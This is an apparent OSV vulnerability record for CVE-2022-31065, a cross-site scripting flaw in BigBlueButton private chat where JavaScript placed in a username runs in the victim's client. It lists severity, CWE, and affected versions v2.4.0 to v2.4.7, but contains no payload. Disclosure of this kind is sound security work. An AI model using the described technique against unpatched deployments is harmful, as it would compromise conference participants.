CVE-2022-31065

Source
https://cve.org/CVERecord?id=CVE-2022-31065
Import Source
https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2022-31065.json
JSON Data
https://api.osv.dev/v1/vulns/CVE-2022-31065
Aliases
  • GHSA-8m2p-7qv3-qff7
Published
2022-06-27T19:45:21Z
Modified
2026-04-10T04:47:44.960161Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L CVSS Calculator
Summary
Cross site scripting vulnerability for private chat in bigbluebutton
Details

BigBlueButton is an open source web conferencing system. In affected versions an attacker can embed malicious JS in their username and have it executed on the victim's client. When a user receives a private chat from the attacker (whose username contains malicious JavaScript), the script gets executed. Additionally when the victim receives a notification that the attacker has left the session. This issue has been patched in version 2.4.8 and 2.5.0. There are no known workarounds for this issue.

Database specific
{
    "cwe_ids": [
        "CWE-79"
    ],
    "cna_assigner": "GitHub_M",
    "osv_generated_from": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2022/31xxx/CVE-2022-31065.json"
}
References

Affected packages

Git / github.com/bigbluebutton/bigbluebutton

Affected ranges

Type
GIT
Repo
https://github.com/bigbluebutton/bigbluebutton
Events

Affected versions

v2.*
v2.4.0
v2.4.1
v2.4.2
v2.4.3
v2.4.4
v2.4.5
v2.4.6
v2.4.7

Database specific

source
"https://storage.googleapis.com/cve-osv-conversion/osv-output/CVE-2022-31065.json"